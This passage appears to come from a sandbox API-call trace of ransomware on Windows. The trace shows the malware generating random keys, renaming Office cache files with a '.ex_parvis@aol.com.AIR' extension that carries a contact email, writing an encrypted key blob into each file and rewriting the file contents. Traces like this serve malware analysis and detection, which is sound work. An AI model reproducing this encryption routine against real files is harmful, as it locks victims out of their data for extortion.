HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3480020 | out: hHeap=0x2e0000) returned 1 [0148.105] CloseHandle (hObject=0x4a4) returned 1 [0148.111] GetProcessHeap () returned 0x2e0000 [0148.111] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0148.111] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0148.111] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0148.111] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0110 | out: hHeap=0x2e0000) returned 1 [0148.112] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0148.112] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385818 [0148.112] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0148.112] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0148.112] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0148.112] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0148.112] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1 [0148.113] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75 [0148.113] GetProcessHeap () returned 0x2e0000 [0148.113] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0148.113] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0148.113] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0148.113] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0148.115] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0148.115] GetProcessHeap () returned 0x2e0000 [0148.115] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0148.115] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1463568) returned 1 [0148.115] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x165510 [0148.116] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0148.116] GetProcessHeap () returned 0x2e0000 [0148.116] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0148.116] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0148.116] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0148.118] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0148.118] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0148.118] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x165510) returned 0x33d0020 [0148.118] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x165510) returned 0x3540020 [0148.118] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.118] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x165510, lpOverlapped=0x0) returned 1 [0148.164] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1463568, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.164] WriteFile (in: hFile=0x4a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x165510, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x2acf9c8*=0x165510, lpOverlapped=0x0) returned 1 [0148.170] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0148.176] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3540020 | out: hHeap=0x2e0000) returned 1 [0148.182] CloseHandle (hObject=0x4a4) returned 1 [0148.192] GetProcessHeap () returned 0x2e0000 [0148.192] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0148.192] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0148.192] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0148.192] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385818 | out: hHeap=0x2e0000) returned 1 [0148.192] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385770 | out: hHeap=0x2e0000) returned 1 [0148.193] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385770 [0148.193] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0148.193] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0148.193] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0148.193] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0148.193] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1 [0148.194] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76 [0148.194] GetProcessHeap () returned 0x2e0000 [0148.194] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0148.194] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0148.194] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0148.194] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0148.197] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0148.197] GetProcessHeap () returned 0x2e0000 [0148.197] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0148.197] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=36233052) returned 1 [0148.197] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x228df5c [0148.197] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0148.197] GetProcessHeap () returned 0x2e0000 [0148.197] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0148.197] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0148.197] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0148.199] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0148.199] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0148.200] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x228df5c) returned 0x33d0020 [0148.201] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x228df5c) returned 0x5660020 [0148.202] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.202] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x228df5c, lpOverlapped=0x0) returned 1 [0149.588] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-36233052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.588] WriteFile (in: hFile=0x4a4, lpBuffer=0x5660020*, nNumberOfBytesToWrite=0x228df5c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x5660020*, lpNumberOfBytesWritten=0x2acf9c8*=0x228df5c, lpOverlapped=0x0) returned 1 [0150.227] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0150.375] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x5660020 | out: hHeap=0x2e0000) returned 1 [0150.522] CloseHandle (hObject=0x4a4) returned 1 [0150.837] GetProcessHeap () returned 0x2e0000 [0150.837] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0150.837] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0150.837] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0150.837] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385770 | out: hHeap=0x2e0000) returned 1 [0150.837] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0150.837] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0150.837] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0150.837] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0150.837] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0150.837] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0150.837] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1 [0150.838] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74 [0150.838] GetProcessHeap () returned 0x2e0000 [0150.838] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfa) returned 0x363a50 [0150.838] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" [0150.839] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0150.839] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0150.842] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0150.842] GetProcessHeap () returned 0x2e0000 [0150.842] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0150.842] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=7378792) returned 1 [0150.842] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x709768 [0150.842] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0150.842] GetProcessHeap () returned 0x2e0000 [0150.842] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0150.843] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0150.843] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0150.846] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0150.846] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0150.846] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x709768) returned 0x33d0020 [0150.846] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x709768) returned 0x3ae0020 [0150.847] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.847] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x709768, lpOverlapped=0x0) returned 1 [0151.107] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-7378792, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.107] WriteFile (in: hFile=0x4a4, lpBuffer=0x3ae0020*, nNumberOfBytesToWrite=0x709768, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x709768, lpOverlapped=0x0) returned 1 [0151.203] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0151.240] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ae0020 | out: hHeap=0x2e0000) returned 1 [0151.272] CloseHandle (hObject=0x4a4) returned 1 [0151.453] GetProcessHeap () returned 0x2e0000 [0151.453] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0151.453] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0151.453] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0151.453] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0151.453] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0151.453] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x30d0048 [0151.454] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0151.454] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0151.454] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0151.454] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0151.454] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1 [0151.502] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71 [0151.502] GetProcessHeap () returned 0x2e0000 [0151.502] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x30d00e0 [0151.502] lstrcpyW (in: lpString1=0x30d00e0, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" [0151.502] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0151.502] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0151.506] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0151.506] GetProcessHeap () returned 0x2e0000 [0151.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d00e0 | out: hHeap=0x2e0000) returned 1 [0151.506] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=174440) returned 1 [0151.506] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2a968 [0151.506] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0151.506] GetProcessHeap () returned 0x2e0000 [0151.506] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0151.506] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0151.506] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0151.508] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0151.508] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.508] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2a968) returned 0x30d00e0 [0151.509] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2a968) returned 0x30faa50 [0151.510] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.510] ReadFile (in: hFile=0x4a4, lpBuffer=0x30d00e0, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d00e0*, lpNumberOfBytesRead=0x2acf9c8*=0x2a968, lpOverlapped=0x0) returned 1 [0151.515] SetFilePointer 